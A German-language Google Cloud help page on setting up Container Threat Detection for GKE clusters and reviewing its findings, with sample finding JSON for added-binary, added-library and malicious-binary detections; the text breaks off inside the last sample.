Auf dieser Seite erfahren Sie, wie Sie Container Threat Detection-Ergebnisse in der Google Cloud Console überprüfen können, und enthält Beispiele für Container Threat Detection-Ergebnisse. Container Threat Detection ist ein integrierter Dienst für die Premium-Stufe von Security Command Center.
Damit Container Threat Detection-Ergebnisse angezeigt werden können, muss der Dienst in den Einstellungen für Dienste in Security Command Center aktiviert sein.
Weitere Informationen zum Ansehen und Verwalten von Container Threat Detection-Ergebnissen finden Sie unter Ergebnisse überprüfen auf dieser Seite.
Informationen zum Aktivieren von Container Threat Detection und anderen Detektoren der Premium-Stufe auf Projektebene finden Sie unter Security Command Center für ein Projekt aktivieren.
Unterstützte GKE-Version verwenden
Achten Sie darauf, dass sich Ihre Cluster in einer unterstützten Version von Google Kubernetes Engine (GKE) befinden, um potenzielle Bedrohungen für Ihre Container zu erkennen. Container Threat Detection unterstützt derzeit die folgenden GKE-Versionen für die stabilen, regulären und schnellen Kanäle:
- GKE Standard >= 1.15.9-gke.12
- GKE Standard >= 1.16.5-gke.2
- GKE Standard >= 1.17
- GKE Standard >= 1.18.10-gke.1400
- GKE Standard >= 1.19.2-gke.2000
- GKE Standard >= 1.20
- GKE Standard >= 1.21
- GKE Autopilot >= 1.21.11-gke.900
- GKE Standard und Autopilot >= 1.22
- GKE Standard und Autopilot >= 1.23
Container Threat Detection unterstützt nur Container-Optimized OS-Knoten-Images.
Container Threat Detection aktivieren
Wenn Sie Security Command Center Premium aktivieren, ist Container Threat Detection standardmäßig aktiviert, sofern Sie sie nicht während des Aktivierungsprozesses deaktivieren.
Wenn Sie Container Threat Detection für Ihre Organisation oder Ihr Projekt aktivieren oder deaktivieren müssen, können Sie dies in Security Command Center auf der Seite Einstellungen tun. Weitere Informationen finden Sie unter Integrierten Dienst aktivieren oder deaktivieren.
Wenn Sie Container Threat Detection aktivieren, indem Sie Security Command Center oder später aktivieren, gehen Sie so vor:
- Führen Sie für alle Cluster, die keine unterstützte Version von GKE verwenden, die Schritte in der Anleitung zum Upgrade eines Clusters aus.
- Achten Sie darauf, dass Ihre Cluster ausreichend Ressourcen verfügbar haben, um das Container Threat Detection DaemonSet auszuführen.
- Prüfen Sie in der Google Cloud Console die Aktivierungseinstellungen des Container Threat Detection-Dienstes, um sicherzugehen, dass Container Threat Detection für Ihre Cluster aktiviert ist.
Erforderliche IAM-Berechtigungen
Container Threat Detection benötigt die Berechtigung zum Aktivieren und Deaktivieren und Verwalten des Container Threat Detection-Agents in GKE-Clustern.
Um die erforderliche Berechtigung zu erteilen, muss dem Container Threat Detection-Dienst-Agent, der eine Art Dienstkonto ist, die IAM-Rolle Container Threat Detection-Dienst-Agent (roles/containerthreatdetection.serviceAgent) gewährt werden.
Wenn diese Standardrolle aus dem Dienst-Agent entfernt wird, funktioniert Container Threat Detection möglicherweise nicht mehr richtig.
Je nachdem, wie und wann Security Command Center aktiviert wurde, unterscheidet sich der Name des Dienst-Agents, den Container Threat Detection verwendet:
Wenn Security Command Center vor dem 7. Dezember 2023 aktiviert wurde, verwendet Container Threat Detection den folgenden nutzerverwalteten Dienst-Agent:
service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.comWenn Security Command Center nach dem 7. Dezember 2023 auf Organisationsebene aktiviert wurde, verwendet Container Threat Detection den folgenden nutzerverwalteten Dienst-Agent auf Organisationsebene:
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.comWenn Security Command Center nach dem 7. Dezember 2023 auf Projektebene aktiviert wurde, verwendet Container Threat Detection den folgenden nutzerverwalteten Dienst-Agent auf Organisationsebene:
service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
Weitere Informationen zu Dienst-Agents und IAM-Rollen finden Sie hier:
GKE-Clusterkonfiguration prüfen
Wenn sich Ihr Cluster in einer Virtual Private Cloud (VPC) befindet, muss das Netzwerk die Routing-, Firewall- und DNS-Anforderungen erfüllen, damit Container Threat Detection mit Google APIs kommunizieren kann. und Dienstleistungen. Lesen Sie die folgenden Anleitungen, um auf Google APIs zuzugreifen:
- Wenn Ihr Cluster ein privater Cluster ist, finden Sie weitere Informationen unter Privaten Google-Zugriff konfigurieren oder Private Service Connect konfigurieren.
- Wenn sich der Cluster in einem VPC Service Controls-Dienstperimeter befindet, muss
containerthreatdetection.googleapis.com, die Container Threat Detection API, als zugänglicher Dienst aufgeführt sein. Weitere Informationen finden Sie unter Dienstperimeter – Übersicht. - Wenn Ihr Cluster kein privater Cluster ist, finden Sie weitere Informationen unter Zugriff auf APIs über VMs mit externen IP-Adressen.
Außerdem darf die Erstellung oder Verwendung von Objekten, die Container Threat Detection benötigt, nicht durch die GKE-Clusterkonfiguration oder Einschränkungen für Organisationsrichtlinien blockiert werden. In den folgenden Abschnitten finden Sie eine Liste von GKE-Objekten, die von Container Threat Detection erstellt werden, und erläutert, wie Sie wichtige GKE-Komponenten für die Arbeit mit Container Threat Detection konfigurieren.
Kubernetes-Objekte
Nach der Einrichtung erstellt Container Threat Detection mehrere GKE-Objekte in Ihren aktivierten Clustern. Die Objekte werden verwendet, um Container-Images zu überwachen, privilegierte Container und Pods zu verwalten und den Status auszuwerten, um Ergebnisse zu generieren. In der folgenden Tabelle sind die Objekte, ihre Eigenschaften und wesentlichen Funktionen aufgeführt.
| Object | Name1 | Attribute | Funktion |
|---|---|---|---|
| ClusterRole | container-watcher-pod-reader |
Gewährt die Berechtigungen get, watch und list für Pods |
|
| ClusterRole | pod-reader |
Gewährt die Berechtigungen get, watch und list für Pods |
|
| ClusterRoleBinding | container-watcher-pod-reader
|
Gewährt dem Dienstkonto container-watcher-pod-reader die Rollen container-watcher-pod-reader und gce:podsecuritypolicy:privileged
|
|
| CustomResourceDefinition | containerwatcherstatuses.containerthreatdetection.googleapis.com |
Berichterstellung zum DaemonSet-Status | |
| DaemonSet | container-watcher2 |
Privilegiert | Interaktionen mit dem Linux-Sicherheitsmodul und der Container-Engine |
| Stellt /host/ als Lese- und Schreibzugriff bereit | Kommunikation mit dem Linux-Sicherheitsmodul | ||
Stellt /etc/container-watcher/secrets als schreibgeschützt bereit, um auf container-watcher-token zuzugreifen |
Authentifizierung | ||
Verwendet hostNetwork |
Ergebnisgenerierung | ||
| Image gke.gcr.io/watcher-daemonset |
Aktivierung und Upgrade | ||
| Back-End containerthreatdetection-REGION.googleapis.com:443 |
Ergebnisgenerierung | ||
| Rolle | container-watcher-status-reporter |
Rolle mit Verben vom Typ get, list, watch, create, update und patch für die CustomResourceDefinition von containerwatcherstatuses.containerthreatdetection.googleapis.com |
Ermöglicht das Aktualisieren von DaemonSet-Statusinformationen |
| RoleBinding | gce:podsecuritypolicy:container-watcher |
Gewährt ServiceAccount container-watcher-pod-reader die Rolle gce:podsecuritypolicy:privileged |
Erhält die Funktionalität, wenn PodSecurityPolicy aktiviert ist |
container-watcher-status-reporter |
Gewährt ServiceAccount container-watcher-pod-reader die Rolle container-watcher-status-reporter |
||
| Secret | container-watcher-token |
Authentifizierung | |
| ServiceAccount | container-watcher-pod-reader |
Aktivierung, Upgrade und Deaktivierung |
1 Alle Objekte befinden sich im kube-system-Namespace, außer container-watcher-pod-reader und gce:podsecuritypolicy:container-watcher.
2 Während der Installation, Aktualisierung oder Entfernung von Container Threat Detection gibt Kubernetes möglicherweise Fehlermeldungen für Kubernetes-Objekte oder andere Abhängigkeiten aus, die vorübergehend fehlen oder unvollständig sind. Die Fehler werden automatisch behoben, wenn Container Threat Detection die Aktion abgeschlossen hat. Wenn die Fehler nicht nach einigen Minuten auftreten, können Sie sie ignorieren.
PodSecurityPolicy und Zugangssteuerungen
Eine PodSecurityPolicy ist eine Ressource der Zugangssteuerung. Diese Ressource können Sie einrichten, um Anfragen zum Erstellen und Aktualisieren von Pods im Cluster zu validieren. Container Threat Detection ist mit PodSecurityPolicies kompatibel, die beim Erstellen oder Aktualisieren eines Clusters mit dem Flag enable-pod-security-policy automatisch angewendet werden. Insbesondere verwendet die Container Threat Detection die Richtlinie gce.privileged, wenn PodSecurityPolicy aktiviert ist.
Wenn Sie benutzerdefinierte PodSecurityPolicies oder andere Zulassungsteuerungen verwenden, dürfen diese die Erstellung oder Verwendung von Objekten nicht blockieren, damit die Container Threat Detection funktioniert. Beispielsweise kann eine Webhook-basierte Zulassungssteuerung, der privilegierte Bereitstellungen ablehnt oder überschreibt, die ordnungsgemäße Funktion der Container Threat Detection verhindern.
Weitere Informationen finden Sie unter Pod-Sicherheitsrichtlinien verwenden.
Umgebungsvariablen aus Container Threat Detection-Ergebnissen ausschließen
Wenn Container Threat Detection ein Ergebnis generiert, meldet es standardmäßig die Umgebungsvariablen für alle Prozesse, auf die im Ergebnis verwiesen wird. Die Werte von Umgebungsvariablen können bei der Untersuchung eines Angriffs wichtig sein. Einige Softwarepakete speichern jedoch Secrets und andere vertrauliche Informationen in Umgebungsvariablen. Um zu verhindern, dass Container Threat Detection Prozessumgebungsvariablen in ein Container Threat Detection-Ergebnis einbezieht, deaktivieren Sie das Modul REPORT_ENVIRONMENT_VARIABLES mithilfe der Google Cloud CLI oder der Security Command Center API ContainerThreatDetectionSettings auf Organisations-, Ordner- oder Projektebene.
Führen Sie beispielsweise den folgenden Befehl aus, um die Berichterstellung zu Umgebungsvariablen in einem Projekt zu deaktivieren:
gcloud alpha scc settings services modules disable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_ENVIRONMENT_VARIABLES \
--project=PROJECT_ID
Wenn Sie das Standardverhalten wiederherstellen möchten, aktivieren Sie die Berichterstellung für Umgebungsvariablen. Führen Sie dazu folgenden Befehl aus:
gcloud alpha scc settings services modules enable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_ENVIRONMENT_VARIABLES \
--project=PROJECT_ID
Alle gcloud alpha scc-Befehle für Module finden Sie unter gcloud alpha
scc settings services
modules.
Befehlszeilenargumente aus Container Threat Detection-Ergebnissen ausschließen
Alle Prozesse haben ein oder mehrere Befehlszeilenargumente. Wenn Container Threat Detection Prozessdetails in ein Ergebnis aufnimmt, werden standardmäßig die CLI-Argumente des Prozesses aufgezeichnet. Befehlszeilenargumentwerte können bei der Untersuchung eines Angriffs wichtig sein. Einige Nutzer können jedoch Secrets und andere vertrauliche Informationen in CLI-Argumenten übergeben. Wenn Sie verhindern möchten, dass Container Threat Detection Prozess-Befehlszeilenargumente in ein Container Threat Detection-Ergebnis einbezieht, deaktivieren Sie das REPORT_CLI_ARGUMENTS-Modul mithilfe der Google Cloud CLI oder der Security Command Center API ContainerThreatDetectionSettings auf Organisations-, Ordner- oder Projektebene.
Wenn Sie beispielsweise die Berichterstellung für CLI-Argumente in einem Projekt deaktivieren möchten, führen Sie den folgenden Befehl aus:
gcloud alpha scc settings services modules disable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_CLI_ARGUMENTS \
--project=PROJECT_ID
Wenn Sie das Standardverhalten wiederherstellen möchten, aktivieren Sie mit dem folgenden Befehl die Berichterstellung für CLI-Argumente:
gcloud alpha scc settings services modules enable \
--service=CONTAINER_THREAT_DETECTION \
--module=REPORT_CLI_ARGUMENTS \
--project=PROJECT_ID
Alle gcloud alpha scc-Befehle für Module finden Sie unter gcloud alpha
scc settings services
modules.
Ressourcennutzung
Container Threat Detection ist so konzipiert, dass sie sich nur geringfügig auf die Leistung Ihrer Cluster auswirkt und keine Latenzeffekte auf Clustervorgänge haben sollte.
Die Ressourcennutzung hängt von der Arbeitslast ab. Die Kernkomponenten von Container Threat Detection – das Userspace DaemonSet und das Linux Security Module (LSM) – haben jedoch die folgenden geschätzten Auswirkungen auf die Leistung:
- DaemonSet: Maximal 0,125 vCPUs und 300 MB Arbeitsspeicher, basierend auf festen Grenzwerten, die zur Einschränkung der Ressourcennutzung festgelegt werden. Limits werden gelegentlich neu ausgewertet und können zur Optimierung der Leistung geändert werden, insbesondere bei sehr großen Knoten.
- LSM: Variiert je nach Arbeitslasteigenschaften. Bei Beanspruchung des LSM bemerken wir jedoch weniger als 2 % der CPU und 1 % des Arbeitsspeichers. Sie können die Auswirkungen auf die Leistung testen, indem Sie Arbeitslasten mit und ohne Container Threat Detection instrumentieren.
Wenn Sie BigQuery-Kunde sind, können Sie die GKE-Nutzungsmessung aktivieren, um die Ressourcennutzung des Userspace-DaemonSets von Container Threat Detection zu überwachen. Suchen Sie nach dem Namespace kube-system und dem Label k8s-app=container-watcher, um das Userspace-DaemonSet in der Nutzungsmessung aufzurufen.
Die GKE-Nutzungsmessung kann keine Kernel-CPU-Nutzung speziell für das LSM verfolgen. Diese Daten sind in der CPU-Gesamtnutzung enthalten.
Container Threat Detection API
Container Threat Detection aktiviert automatisch die containerthreatdetection API während der Einrichtung, um die Generierung zu ermöglichen. Sie sollten nicht direkt mit dieser erforderlichen API interagieren. Eine Deaktivierung dieser API würde die Fähigkeit von Container Threat Detection beeinträchtigen, neue Ergebnisse zu generieren. Wenn Sie keine Ergebnisse von Container Threat Detection mehr erhalten möchten, deaktivieren Sie Container Threat Detection in den Services-Einstellungen von Security Command Center.
Ergebnisse prüfen
Wenn Container Threat Detection Ergebnisse generiert, können Sie diese im Security Command Center anzeigen. Wenn Sie kontinuierliche Exporte konfiguriert haben, um Logs zu schreiben, können Sie sich die Ergebnisse auch in Cloud Logging ansehen. Wenn Sie ein Ergebnis generieren und Ihre Konfiguration prüfen möchten, können Sie absichtlich einen Detektor auslösen und Container Threat Detection testen.
Container Threat Detection hat folgende Latenzen:
- Aktivierungslatenz von 3,5 Stunden für neu aufgenommene Organisationen oder Projekte.
- Aktivierungslatenz von Minuten für neu erstellte Cluster.
- Erkennung der Latenz von Minuten für Bedrohungen in Clustern, die aktiviert wurden.
Ergebnisse in der Google Cloud Console prüfen
Die IAM-Rollen für Security Command Center können auf Organisations-, Ordner- oder Projektebene gewährt werden. Die Möglichkeit, Ergebnisse, Assets und Sicherheitsquellen anzusehen, zu bearbeiten, zu erstellen oder zu aktualisieren, hängt von der Ebene ab, auf die Ihnen Zugriff gewährt wurde. Weitere Informationen zu Security Command Center-Rollen finden Sie unter Zugriffssteuerung.
So prüfen Sie die Ergebnisse von Container Threat Detection in Security Command Center:
Wechseln Sie in der Google Cloud Console zur Seite Ergebnisse des Security Command Center.
Wählen Sie gegebenenfalls Ihr Google Cloud-Projekt oder Ihre Organisation aus.
Wählen Sie im Abschnitt Schnellfilter im Unterabschnitt Anzeigename der Quelle die Option Container Thread Detection aus.
Klicken Sie auf den Namen des Ergebnisses unter
Category, um Details zu einem bestimmten Ergebnis aufzurufen. Der Bereich mit den Ergebnisdetails wird erweitert und enthält Informationen zum Ergebnis. Die Informationen sind in einige oder alle der folgenden Abschnitte unterteilt:- Erkannt: Informationen zum erkannten Sicherheitsproblem, einschließlich einer KI-generierten ZusammenfassungVorschau des Problems.
- Betroffene Ressource: Informationen zur Ressource, in der das Problem erkannt wurde.
- Sicherheitsmarkierungen: Alle Sicherheitsmarkierungen, die Ihr Team dem Ergebnis möglicherweise hinzugefügt hat.
- Nächste Schritte: Alle Schritte zur Behebung des Problems.
- Weitere Informationen: Links zu relevanten Standards, zugehörigen Ergebnissen, zusätzlichen Prüftools usw.
- Erkennungsdienst: Informationen zum Security Command Center-Dienst, der das Problem erkannt hat, z. B. Container Threat Detection, sowie Informationen zum Ergebnis selbst.
Klicken Sie auf den Tab JSON, um die vollständige JSON-Struktur des Ergebnisses anzusehen.
Eine Liste der Ergebnisse der Container Threat Detection finden Sie unter Container Threat Detection-Detektoren.
Ergebnisse in Cloud Logging ansehen
So rufen Sie die Ergebnisse der Container Threat Detection in Cloud Logging auf:
Rufen Sie in der Google Cloud Console den Log-Explorer für Cloud Logging auf.
Wählen Sie in der Projektauswahl oben auf der Seite das Projekt aus, in dem Sie die Container Threat Detection-Logs speichern.
Klicken Sie auf den Tab Query Builder.
Wählen Sie in der Drop-down-Liste Ressource die Option Threat Detector aus.
- Um Ergebnisse von allen Detektoren anzuzeigen, wählen Sie all detector_name aus.
- Wählen Sie den Namen eines Detektors aus, um die Ergebnisse zu sehen.
Alternativ können Sie
resource.type="threat_detector"in das Textfeld des Query Builders eingeben und dann auf Abfrage ausführen klicken.Die Tabelle wird mit den ausgewählten Logs aktualisiert.
Erstellen Sie erweiterte Logabfragen, um eine Reihe von Logeinträgen aus beliebig vielen Logs anzugeben.
Beispiele für Ergebnisformate
Dieser Abschnitt enthält die JSON-Formate der Container Threat Detection-Ergebnisse.
Diese Beispiele enthalten die Felder, die für alle Ergebnisse am häufigsten verwendet werden. Allerdings sind möglicherweise nicht alle Ergebnisse in jedem Ergebnis enthalten. Die tatsächliche Ausgabe hängt von der Konfiguration einer Ressource und der Art und dem Status der Ergebnisse ab. Informationen von Kubernetes und containerd werden bestmöglich auf Basis von Best-Effort-Angaben bereitgestellt und sind nicht garantiert.
Weitere Informationen zu den Feldern in den einzelnen Ergebnissen finden Sie in den Feldbeschreibungen unter REST-Ressource: organizations.sources.findings.
Ausgeführte Binärdatei hinzugeführt
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Added Binary Executed",
"sourceProperties": {
"VM_Instance_Name": "INSTANCE_ID",
"Added_Binary_Kind": "Added",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Name": "CONTAINER_NAME",
"Parent_Pid": 1.0,
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Creation_Timestamp": {
"seconds": 1.617989997E9,
"nanos": 1.17396995E8
},
"Pid": 53.0,
"Pod_Namespace": "default",
"Process_Binary_Fullpath": "BINARY_PATH",
"Process_Arguments": ["BINARY_PATH"],
"Pod_Name": "POD_NAME",
"description": "A binary that was not part of the original container image
was executed. If an added binary is executed by an attacker, this is a
possible sign that an attacker has control of the workload and they are
executing arbitrary commands.",
"Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
test-4af235e12be6f9d9", "HOME\u003d/root",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
"Container_Creation_Timestamp": {
"seconds": 1.617989918E9,
"nanos": 0.0
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:39:57.527Z",
"createTime": "2021-04-09T17:39:57.625Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Added_Binary_Kind": {
"primitiveDataType": "STRING"
},
"description": {
"primitiveDataType": "STRING"
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "LOW",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Hinzugefügte Mediathek geladen
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Added Library Loaded",
"sourceProperties": {
"Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
"Parent_Pid": 1.0,
"Container_Name": "CONTAINER_NAME",
"Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Creation_Timestamp": {
"seconds": 1.618004144E9,
"nanos": 0.0
},
"Pod_Name": "POD_NAME",
"Pid": 7.0,
"description": "A library that was not part of the original container
image was loaded. If an added library is loaded, this is a possible sign
that an attacker has control of the workload and they are executing
arbitrary code.",
"VM_Instance_Name": "INSTANCE_ID",
"Pod_Namespace": "default",
"Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
"KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
"HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
, "KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
"Process_Binary_Fullpath": "BINARY_PATH",
"Added_Library_Kind": "Added",
"Container_Image_Uri": "CONTAINER_IMAGE_uri"
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T21:36:13.069Z",
"createTime": "2021-04-09T21:36:13.267Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Added_Library_Fullpath": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"description": {
"primitiveDataType": "STRING"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Added_Library_Kind": {
"primitiveDataType": "STRING"
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "LOW",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Ausführung: schädliche Ausführung von Binärcode hinzugefügt
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Added Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T19:51:22.538Z",
"database": {},
"eventTime": "2023-11-13T19:51:22.383Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.68.2.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-added-test-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.68.2.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.68.2.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.68.2.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "added_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699905066",
"nanos": 618571329
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
